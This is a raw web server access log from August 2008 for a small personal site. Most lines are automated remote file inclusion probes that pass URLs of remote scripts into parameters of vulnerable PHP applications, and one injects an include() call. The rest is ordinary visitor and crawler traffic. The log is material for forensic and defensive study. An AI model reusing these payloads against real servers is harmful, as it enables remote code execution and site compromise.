82.98.141.70 - - [17/Aug/2008:01:11:09 -0500] "GET /errors.php?error=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
200.150.189.10 - - [17/Aug/2008:01:11:38 -0500] "GET /index.php?DOCUMENT_ROOT=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.76"
200.150.189.10 - - [17/Aug/2008:01:11:38 -0500] "GET /logs/index.php?DOCUMENT_ROOT=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.76"
82.98.141.70 - - [17/Aug/2008:01:16:36 -0500] "GET /errors.php?error=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
82.98.141.70 - - [17/Aug/2008:01:16:36 -0500] "GET /logs/errors.php?error=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
63.247.85.66 - - [17/Aug/2008:01:18:42 -0500] "GET /logs/bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=http://v3.siteframe.org/files/0002/mic22.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.812"
63.247.85.66 - - [17/Aug/2008:01:18:42 -0500] "GET /bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=http://v3.siteframe.org/files/0002/mic22.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
202.60.72.69 - - [17/Aug/2008:01:18:51 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.811"
202.60.72.69 - - [17/Aug/2008:01:18:52 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.811"
218.38.18.28 - - [17/Aug/2008:01:19:12 -0500] "GET /logs/access_log.1214438400//skins//errors.php?error=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
218.38.18.28 - - [17/Aug/2008:01:19:12 -0500] "GET //skins//errors.php?error=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
218.38.18.28 - - [17/Aug/2008:01:19:13 -0500] "GET /logs//skins//errors.php?error=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
77.232.68.17 - - [17/Aug/2008:01:22:00 -0500] "GET /logs/access_log.1206230400//claroline/tracking/userLog.php?rootSys=http://64.251.8.142/safe.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
77.232.68.17 - - [17/Aug/2008:01:22:01 -0500] "GET //claroline/tracking/userLog.php?rootSys=http://64.251.8.142/safe.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
77.232.68.17 - - [17/Aug/2008:01:22:01 -0500] "GET /logs//claroline/tracking/userLog.php?rootSys=http://64.251.8.142/safe.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
217.23.156.220 - - [17/Aug/2008:01:26:57 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
217.23.156.220 - - [17/Aug/2008:01:26:57 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
218.38.12.93 - - [17/Aug/2008:01:27:09 -0500] "GET /logs/access_log.1214438400//skins//errors.php?error=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
218.38.12.93 - - [17/Aug/2008:01:27:10 -0500] "GET //skins//errors.php?error=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
218.38.12.93 - - [17/Aug/2008:01:27:10 -0500] "GET /logs//skins//errors.php?error=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
218.38.18.28 - - [17/Aug/2008:01:28:15 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
218.38.18.28 - - [17/Aug/2008:01:28:15 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
88.84.132.4 - - [17/Aug/2008:01:30:25 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
88.84.132.4 - - [17/Aug/2008:01:30:25 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
88.84.132.4 - - [17/Aug/2008:01:30:35 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
88.84.132.4 - - [17/Aug/2008:01:30:36 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
70.85.201.66 - - [17/Aug/2008:01:31:27 -0500] "GET /logs/access_log.1208044800//modules/xfsection//modify.php?dir_module=http://go4wallpapers.com/babes/id.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.811"
70.85.201.66 - - [17/Aug/2008:01:31:27 -0500] "GET //modules/xfsection//modify.php?dir_module=http://go4wallpapers.com/babes/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
70.85.201.66 - - [17/Aug/2008:01:31:27 -0500] "GET /logs//modules/xfsection//modify.php?dir_module=http://go4wallpapers.com/babes/id.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.811"
65.98.70.18 - - [17/Aug/2008:01:33:13 -0500] "GET /logs/include.php?path[docroot]=http://www.topyn.com/ips.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
65.98.70.18 - - [17/Aug/2008:01:33:13 -0500] "GET /include.php?path[docroot]=http://www.topyn.com/ips.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.811"
218.38.18.28 - - [17/Aug/2008:01:34:31 -0500] "GET /logs/?/ask_password.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 200 95581 "-""libwww-perl/5.79"
218.38.18.28 - - [17/Aug/2008:01:34:31 -0500] "GET /?/ask_password.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
147.202.40.223 - - [17/Aug/2008:01:36:08 -0500] "GET /logs/access_log.1213488000//init_basic.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.814"
72.191.109.143 - - [17/Aug/2008:01:37:38 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://search.yahoo.com/search?ei=utf-8&fr=slv8-msgr&p=1950%27s%20tattoo%20flash&type=""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:37:38 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:37:38 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:37:39 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
24.15.17.201 - - [17/Aug/2008:01:37:42 -0500] "GET /logs/access_log.1208736000//admin/editor2/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
218.38.18.28 - - [17/Aug/2008:01:38:00 -0500] "GET /logs//?ask_password.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 200 95586 "-""libwww-perl/5.79"
218.38.18.28 - - [17/Aug/2008:01:38:00 -0500] "GET //?ask_password.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
74.6.22.107 - - [17/Aug/2008:01:38:52 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.107 - - [17/Aug/2008:01:38:53 -0500] "GET /logs/access_log.1217635200 HTTP/1.0" 200 803460 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.191.109.143 - - [17/Aug/2008:01:39:28 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "http://tatthoo.com/tattoocat32.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:28 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:28 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:32 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:32 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:32 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:33 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:33 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:33 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:33 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:33 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:33 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:33 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:33 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:47 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:48 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:48 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:48 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:48 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:48 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:48 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:48 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:48 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:48 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:39:48 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
213.33.84.163 - - [17/Aug/2008:01:39:52 -0500] "GET /logs//oneadmin/config.php?path[docroot]=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
213.33.84.163 - - [17/Aug/2008:01:39:53 -0500] "GET //oneadmin/config.php?path[docroot]=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
72.191.109.143 - - [17/Aug/2008:01:40:00 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:40:00 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:40:00 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
72.191.109.143 - - [17/Aug/2008:01:40:00 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
218.38.18.28 - - [17/Aug/2008:01:40:13 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
218.38.18.28 - - [17/Aug/2008:01:40:13 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
200.251.46.29 - - [17/Aug/2008:01:43:38 -0500] "GET /logs//oneadmin/config.php?path[docroot]=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
200.251.46.29 - - [17/Aug/2008:01:43:38 -0500] "GET //oneadmin/config.php?path[docroot]=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
62.109.176.109 - - [17/Aug/2008:01:44:20 -0500] "GET /logs/access_log.1213488000//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.109.176.109 - - [17/Aug/2008:01:44:22 -0500] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.109.176.109 - - [17/Aug/2008:01:44:25 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
77.232.68.17 - - [17/Aug/2008:01:45:37 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://64.251.8.142/safe.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
77.232.68.17 - - [17/Aug/2008:01:45:37 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://64.251.8.142/safe.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
193.142.215.12 - - [17/Aug/2008:01:47:33 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://64.251.8.142/safe.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.808"
193.142.215.12 - - [17/Aug/2008:01:47:33 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://64.251.8.142/safe.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.808"
64.26.63.11 - - [17/Aug/2008:01:48:29 -0500] "GET /logs/access_log.1214438400//oneadmin/config.php?path[docroot]=http://www.gugn.ru/news/data/archives/readme.txt???? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
64.26.63.11 - - [17/Aug/2008:01:48:29 -0500] "GET //oneadmin/config.php?path[docroot]=http://www.gugn.ru/news/data/archives/readme.txt???? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
64.26.63.11 - - [17/Aug/2008:01:48:29 -0500] "GET /logs//oneadmin/config.php?path[docroot]=http://www.gugn.ru/news/data/archives/readme.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
128.187.43.19 - - [17/Aug/2008:01:50:04 -0500] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
128.187.43.19 - - [17/Aug/2008:01:50:04 -0500] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
218.38.12.93 - - [17/Aug/2008:01:50:14 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
218.38.12.93 - - [17/Aug/2008:01:50:14 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
88.84.132.4 - - [17/Aug/2008:01:51:22 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
88.84.132.4 - - [17/Aug/2008:01:51:23 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
62.109.176.109 - - [17/Aug/2008:01:51:29 -0500] "GET /logs/access_log.1214179200//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
64.26.63.11 - - [17/Aug/2008:01:51:43 -0500] "GET /logs/access_log.1214438400%20//oneadmin/config.php?path[docroot]=http://www.gugn.ru/news/data/archives/readme.txt???? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
64.26.63.11 - - [17/Aug/2008:01:53:01 -0500] "GET /logs//oneadmin/config.php?path[docroot]=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
64.26.63.11 - - [17/Aug/2008:01:53:01 -0500] "GET //oneadmin/config.php?path[docroot]=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
67.195.37.153 - - [17/Aug/2008:01:53:51 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.153 - - [17/Aug/2008:01:53:51 -0500] "GET /costume/costume2.htm HTTP/1.0" 200 1810 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
218.38.12.93 - - [17/Aug/2008:01:53:55 -0500] "GET /logs/?/ask_password.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 200 95581 "-""libwww-perl/5.79"
218.38.12.93 - - [17/Aug/2008:01:53:56 -0500] "GET /?/ask_password.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
70.85.222.106 - - [17/Aug/2008:01:54:01 -0500] "GET /logs/index.php?DOCUMENT_ROOT=http://securessh.t35.com/id.txt?%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
70.85.222.106 - - [17/Aug/2008:01:54:01 -0500] "GET /index.php?DOCUMENT_ROOT=http://securessh.t35.com/id.txt?%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.808"
218.38.12.93 - - [17/Aug/2008:01:54:15 -0500] "GET /logs//?ask_password.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 200 95586 "-""libwww-perl/5.79"
218.38.12.93 - - [17/Aug/2008:01:54:16 -0500] "GET //?ask_password.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
88.84.132.4 - - [17/Aug/2008:01:54:34 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
88.84.132.4 - - [17/Aug/2008:01:54:34 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
64.105.33.158 - - [17/Aug/2008:01:55:26 -0500] "GET /logs/access_log.1214438400/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.195.37.153 - - [17/Aug/2008:01:55:46 -0500] "GET /costume/thmb2.htm HTTP/1.0" 200 3346 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.153 - - [17/Aug/2008:01:55:56 -0500] "GET /costume/thmb3.htm HTTP/1.0" 200 2922 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.164.114 - - [17/Aug/2008:01:56:06 -0500] "GET /logs/access_log.1214438400//oneadmin/config.php?path[docroot]=http://www.gugn.ru/news/data/archives/readme.txt???? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
209.59.164.114 - - [17/Aug/2008:01:56:06 -0500] "GET //oneadmin/config.php?path[docroot]=http://www.gugn.ru/news/data/archives/readme.txt???? HTTP/1.1" 404 304 "-""libwww-perl/5.811"
209.59.164.114 - - [17/Aug/2008:01:56:07 -0500] "GET /logs//oneadmin/config.php?path[docroot]=http://www.gugn.ru/news/data/archives/readme.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
67.195.37.153 - - [17/Aug/2008:01:56:07 -0500] "GET /costume/links.htm HTTP/1.0" 200 1029 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
88.84.132.4 - - [17/Aug/2008:01:56:08 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
88.84.132.4 - - [17/Aug/2008:01:56:08 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
88.84.132.4 - - [17/Aug/2008:01:56:19 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
